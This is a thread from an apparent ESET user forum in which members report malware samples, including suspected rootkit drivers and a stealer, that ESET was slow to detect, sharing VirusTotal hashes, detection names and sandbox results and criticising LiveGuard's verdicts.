Some samples submitted but not processed

[AnthonyQ 48]

16 hours ago, SeriousHoax said:

I can only say what I experience myself. Talking about malware submission experience, I sent this sample to ESET more than 2 weeks ago on 12 August but neither I have heard back nor a signature has been created yet. LiveGuard gave it a safe verdict, but it's not safe.

If possible, please improve the processing of samples submitted by users.

VT link of the sample: VirusTotal - File - d468b56da07173c69423973b706924187e134d0baea07e2ef8e7b49afcd5aacd

ESET has added a detection "A Variant Of Generik.NGIZHAK" for it. Too late. Also I don't think this Generik detection is able to cover future variants of this malware.

Edited August 27, 2022 by AnthonyQ

[itman 1,659]

12 hours ago, AnthonyQ said:

ESET has added a detection "A Variant Of Generik.NGIZHAK" for it. Too late. Also I don't think this Generik detection is able to cover future variants of this malware.

Microsoft has a sig. for it that's two years old: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win64/Tnega!MSR&ThreatID=2147762521

[Marcos 5,074]

1 hour ago, itman said:

Microsoft has a sig. for it that's two years old: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win64/Tnega!MSR&ThreatID=2147762521

To put it right, the detection name tells nothing about when a detection was added. I've scanned the sample in question with Defender updated about 2 months ago and it wasn't detected:

[AnthonyQ 48]

Another two samples submitted hours ago but is still not detected:

https://www.virustotal.com/gui/file/8a27bb4abb5e37bcce889739860b6d2c70af82c4b3f8e6c21490e122495324b5

https://www.virustotal.com/gui/file/d1145a9ed5625c75ada3d584eec7b030b27454a34905838faedeaf497b915164

[itman 1,659]

13 hours ago, AnthonyQ said:

Another two samples submitted hours ago but is still not detected:

https://www.virustotal.com/gui/file/8a27bb4abb5e37bcce889739860b6d2c70af82c4b3f8e6c21490e122495324b5

https://www.virustotal.com/gui/file/d1145a9ed5625c75ada3d584eec7b030b27454a34905838faedeaf497b915164

I assume LiveGuard gave a safe verdict on theses? Both samples employ VM/sandbox detection and evasion tactics such as sleeping and dummy code loop execution.

Sample 1 exploits CVE-2015-3005:

Quote

Cross-site scripting (XSS) vulnerability in the Dynamic VPN in Juniper Junos 12.1X44 before 12.1X44-D45, 12.1X46 before 12.1X46-D30, 12.1X47 before 12.1X47-D20, and 12.3X48 before 12.3X48-D10 on SRX series devices allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.

Sample 2 exploits CVE-2015-3008:

Quote

Asterisk Open Source 1.8 before 1.8.32.3, 11.x before 11.17.1, 12.x before 12.8.2, and 13.x before 13.3.2 and Certified Asterisk 1.8.28 before 1.8.28-cert5, 11.6 before 11.6-cert11, and 13.1 before 13.1-cert2, when registering a SIP TLS device, does not properly handle a null byte in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority.

I would say these are targeted attacks with a low frequency occurrence. Also exploits are N/A unless the vulnerability exists on the device.

Edited September 2, 2022 by itman

[itman 1,659]

Looks like LiveGuard script detection has improved.

I found a .vbs sample that currently only Kaspersky and Symantec detect at VT: https://www.virustotal.com/gui/file/b875722c0e57a6a03109c144f31e18f4788ac61407569f54e560c3507321aeac/detection . What was interesting about this was LiveGuard detection popup just stated file was malicious and deleted. Further confirmed by Detection log entry created;

Time;Scanner;Object type;Object;Detection;Action;User;Information;Hash;First seen here
9/2/2022 4:44:52 PM;ESET LiveGuard;file;C:\Users\xxxxxx\Downloads\b875722c0e57a6a03109c144f31e18f4788ac61407569f54e560c3507321aeac.vbs;ESET LiveGuard;deleted;;;A97862BCD4EFCAC0F0379BBC5160B803AD89AAFA;9/2/2022 4:43:19 PM

-EDIT- 9/3

Eset now has a sig. for this malware, A Variant Of Generik.HHTKOJH. Also, as of this morning only 14 vendors at VT detect it. Avast/AVG, Microsoft, etc. do not detect it.

Edited September 3, 2022 by itman

[itman 1,659]

As far as LiveGuard detection capability of .exe's, nothing has changed.

I found a recent malicious Russian based cracked version of anydesk.exe. Only two vendors at VT detect w/Rising being one of them: https://www.virustotal.com/gui/file/1a1649dead5505b7a692b868d15ebcf964497e284461d927513e7b8cc7f7fb0c/detection . Also of note is Joe's Cloud Sandbox found it malicious but only with a 55/100 confidence factor: https://www.joesandbox.com/analysis/697110/0/html .

LiveGuard immediately sent this one to Eset Virus Lab, but gave it a safe verdict.  Also verdict was returned in approx. 2 mins indicating to me no in depth analysis was done. I swear that LiveGuard is no better than what exists in EIS with LiveGrid only pertaining to .exe's . All that occurs in LiveGuard cloud is a cursory scan which really isn't much better than what local hueristic scanning provides.

Edited September 4, 2022 by itman

[AnthonyQ 48]

7 hours ago, itman said:

As far as LiveGuard detection capability of .exe's, nothing has changed.

I found a recent malicious Russian based cracked version of anydesk.exe. Only two vendors at VT detect w/Rising being one of them: https://www.virustotal.com/gui/file/1a1649dead5505b7a692b868d15ebcf964497e284461d927513e7b8cc7f7fb0c/detection . Also of note is Joe's Cloud Sandbox found it malicious but only with a 55/100 confidence factor: https://www.joesandbox.com/analysis/697110/0/html .

LiveGuard immediately sent this one to Eset Virus Lab, but gave it a safe verdict.  Also verdict was returned in approx. 2 mins indicating to me no in depth analysis was done. I swear that LiveGuard is no better than what exists in EIS as far as LiveGrid pertaining to .exe's . All that occurs in LiveGuard cloud is a cursory scan which really isn't much better than what local hueristic scanning provides.

From my experience, I feel that most threats detected by LiveGuard can also be detected by other ESET’s post-execution detection technologies, such as Advanced Memory Scanner, HTTP filter, ransomware shield, and so on. 

Edited September 4, 2022 by AnthonyQ

[itman 1,659]

18 hours ago, itman said:

malicious Russian based cracked version of anydesk.exe

BitDefender, Emsisoft, and FireEye now detecting this.

Tip to Eset - look for Costura Assembly Loader presence.

[Nightowl 202]

On 9/2/2022 at 11:59 PM, itman said:

Looks like LiveGuard script detection has improved.

I found a .vbs sample that currently only Kaspersky and Symantec detect at VT: https://www.virustotal.com/gui/file/b875722c0e57a6a03109c144f31e18f4788ac61407569f54e560c3507321aeac/detection . What was interesting about this was LiveGuard detection popup just stated file was malicious and deleted. Further confirmed by Detection log entry created;

Time;Scanner;Object type;Object;Detection;Action;User;Information;Hash;First seen here
9/2/2022 4:44:52 PM;ESET LiveGuard;file;C:\Users\xxxxxx\Downloads\b875722c0e57a6a03109c144f31e18f4788ac61407569f54e560c3507321aeac.vbs;ESET LiveGuard;deleted;;;A97862BCD4EFCAC0F0379BBC5160B803AD89AAFA;9/2/2022 4:43:19 PM

-EDIT- 9/3

Eset now has a sig. for this malware, A Variant Of Generik.HHTKOJH. Also, as of this morning only 14 vendors at VT detect it. Avast/AVG, Microsoft, etc. do not detect it.

Weird , your link triggers ESET Endpoint Linux

 

Edited September 6, 2022 by Nightowl

[itman 1,659]

8 hours ago, Nightowl said:

Weird , your link triggers ESET Endpoint Linux

That is very weird since link is OK using Win 10 and Firefox:

Also strange is that Eset Linux indicates PowerShell based malware? I assume you installed PowerShell on your Linux build: https://docs.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-linux?view=powershell-7.2 ?

I also believe I know what might have caused this. Someone in the VT web page Comments section posted a URL where this malware could be downloaded from. The comment has been removed. Guess Eset Linux triggered on that URL. Try to access  the link again.

Edited September 6, 2022 by itman

[Nightowl 202]

16 hours ago, itman said:

That is very weird since link is OK using Win 10 and Firefox:

Also strange is that Eset Linux indicates PowerShell based malware? I assume you installed PowerShell on your Linux build: https://docs.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-linux?view=powershell-7.2 ?

I also believe I know what might have caused this. Someone in the VT web page Comments section posted a URL where this malware could be downloaded from. The comment has been removed. Guess Eset Linux triggered on that URL. Try to access  the link again.

No I didn't install Powershell and the detection is still triggered when that page is visited.

[itman 1,659]

12 hours ago, Nightowl said:

No I didn't install Powershell and the detection is still triggered when that page is visited.

Try this link: https://www.virustotal.com/gui/file/b875722c0e57a6a03109c144f31e18f4788ac61407569f54e560c3507321aeac , instead. Note that the only difference is "/detection" is not appended to the URL.

Regardless, Eset Linux should not be detecting anything on the link I originally posted. If Eset Linux detects on the above link I just posted, I would say you are being browser redirected to a malicious web site.

Edited September 7, 2022 by itman

[Nightowl 202]

16 hours ago, itman said:

Try this link: https://www.virustotal.com/gui/file/b875722c0e57a6a03109c144f31e18f4788ac61407569f54e560c3507321aeac , instead. Note that the only difference is "/detection" is not appended to the URL.

Regardless, Eset Linux should not be detecting anything on the link I originally posted. If Eset Linux detects on the above link I just posted, I would say you are being browser redirected to a malicious web site.

Still the same my brother , and I don't think I am being redirected to anywhere , I don't have JS at all with Firefox and uBlock origin and I am protected by a good firewall, and this PC is safe

[itman 1,659]

7 hours ago, Nightowl said:

Still the same my brother , and I don't think I am being redirected to anywhere , I don't have JS at all with Firefox and uBlock origin and I am protected by a good firewall, and this PC is safe

The last thing you can try is to go VT home page using this URL: https://www.virustotal.com . Prior to doing this, clear your Firefox startup cache via Troubleshooting option.

Now do a hash search using this SHA1 hash, a97862bcd4efcac0f0379bbc5160b803ad89aafa , of the malware. What should be displayed is the VT web page corresponding to URL I posted yesterday.

If Eset Linux performs the same malware detection behavior, something is screwed up with it.

Edited September 8, 2022 by itman

[AnthonyQ 48]

I've submitted the following potential Rootkit samples to ESET Labs via Email more than ten days ago, but I have not received any replies and no detection was added. 

https://www.virustotal.com/gui/file/eaad75470e21084ab3a38f6cb0f3aa72d4203260515619f8703e3fc80e800d7a

https://www.virustotal.com/gui/file/b83915f38f022aaf9b540f80514fbbc19febf76538788a2f5e351d4e65c1b417

https://www.virustotal.com/gui/file/8bef06598b67c1edbbf42399a19c8a8aa61d12466e873d70e9e26a10ba54d308

Does that mean ESET found the above samples were not not malicious and detection was not necessary?

[itman 1,659]

13 hours ago, AnthonyQ said:

I've submitted the following potential Rootkit samples to ESET Labs via Email more than ten days ago, but I have not received any replies and no detection was added. 

https://www.virustotal.com/gui/file/eaad75470e21084ab3a38f6cb0f3aa72d4203260515619f8703e3fc80e800d7a

https://www.virustotal.com/gui/file/b83915f38f022aaf9b540f80514fbbc19febf76538788a2f5e351d4e65c1b417

https://www.virustotal.com/gui/file/8bef06598b67c1edbbf42399a19c8a8aa61d12466e873d70e9e26a10ba54d308

Does that mean ESET found the above samples were not not malicious and detection was not necessary?

These are all validly Win 10/11 attestation signed drivers. I wrote a forum posting a while back about the potential dangers of those here: https://forum.eset.com/topic/32841-a-clear-and-present-danger-lurking-in-windows-1011/#comment-153631 . Looks like that posting "fell on deaf Eset ears."

My recommendation was and still is that Eset optionally warn about attempted attestation driver installation. Legit commercially purchased software do no use attestation signed drivers.

-EDIT- I guess I should update my previous forum posting to note that attestation signed drivers also work on Windows Server 2016/2019. Of note:

Quote

NOTE: it is not required to pass the HLK tests just to get a driver that loads on Windows Server 2016/2019. An attestation-signed driver is good enough. This claim contradicts the "official" Microsoft documentation but trust me, it is true. Our installers have attestation-signed drivers and no Windows Server 2016/2019 users have complained. Apparently that particular piece of MS documentation was written at a time when MS was _planning_ to require WHQL-certified drivers for Windows Server 2016+, then backpedaled and forgot to update the documentation.

https://community.openvpn.net/openvpn/wiki/HLKTesting

A good example of the question, "Should you really trust VPN software?"

Edited September 12, 2022 by itman

[AnthonyQ 48]

Rogue software (https://www.virustotal.com/gui/file/929172dd61611225b11ebb6da098122ff813d7c266dd632be326d16d338e8df5) was submitted on 13/9/2022 but not added to detection database.

[itman 1,659]

@AnthonyQ, posting Eset undetected malware samples in the forum appears to be "an effort in futility." Eset still doesn't detect the rootkit driver samples you posted here: https://forum.eset.com/topic/33462-some-samples-submitted-but-not-processed/?do=findComment&comment=156039 .

[AnthonyQ 48]

5 hours ago, itman said:

@AnthonyQ, posting Eset undetected malware samples in the forum appears to be "an effort in futility." Eset still doesn't detect the rootkit driver samples you posted here: https://forum.eset.com/topic/33462-some-samples-submitted-but-not-processed/?do=findComment&comment=156039 .

Just checked, these Rootkit samples are finally detected as Win64/Rootkit.Agent.BQ.

[itman 1,659]

13 hours ago, AnthonyQ said:

Just checked, these Rootkit samples are finally detected as Win64/Rootkit.Agent.BQ.

So it took Eset almost 3 weeks to determine these drivers were malicious ..........🙄

BTW - these driver samples should be reported to Microsoft which still doesn't detect them so that their code signing certificates are revoked.

Edited September 18, 2022 by itman

[peteyt 393]

2 hours ago, itman said:

So it took Eset almost 3 weeks to determine these drivers were malicious ..........🙄

BTW - these driver samples should be reported to Microsoft which still doesn't detect them so that their code signing certificates are revoked.

I'd be curious to hear from Eset why it took 3 weeks.

I understand they will need to do some testing but presume some is automated. I presume they also get a lot of submissions. But the issue I have is that in between those 3 weeks many people may have been infected which will be alarming to those people if they heard it was submitted a while ago and yet has only just been added as a signature

[itman 1,659]

2 hours ago, peteyt said:

I understand they will need to do some testing but presume some is automated.

The problem is these rootkit driver samples were submitted to VT without any related software use. Unless the loaded driver is specifically used by one or more Win OS components, the loaded driver does nothing. This is confirmed by the cloud sandboxes that originally examined the drivers; none found them malicious.

Assumed is the security solutions that originally detected these drivers at VT did so via generic signature heuristic scanning detection.

Since CloudStrike Falcon detected the first driver sample as malicious at VT, I regenerated a new scan report at the Hybrid-Analysis web site: https://www.hybrid-analysis.com/sample/eaad75470e21084ab3a38f6cb0f3aa72d4203260515619f8703e3fc80e800d7a/6327815d896b877bb501614e . Besides factoring in existing VT AV detections, the other element in the malicious rating was a MITRE factor as to ntoskrnl.exe access. Again, it appears the driver code was examined versus any driver behavior activities.

Edited September 18, 2022 by itman

[AnthonyQ 48]

A stealer sample that was submitted via email almost 2 days ago is still not detected by ESET: https://www.virustotal.com/gui/file/609cccf310e725ba4ff4d74edffa0c33d4640f3c391dbbac4e1d00dd3f9c249e

[itman 1,659]

On 9/23/2022 at 1:06 PM, AnthonyQ said:

A stealer sample that was submitted via email almost 2 days ago is still not detected by ESET: https://www.virustotal.com/gui/file/609cccf310e725ba4ff4d74edffa0c33d4640f3c391dbbac4e1d00dd3f9c249e

When I checked VT yesterday, Eset now detects it.

BTW - this is an example of why I also use OSArmor. Referring to VT detection sandbox behavior, it would have blocked it via unusually command script characteristics and/or attempted to modify existing PowerShell execution policy.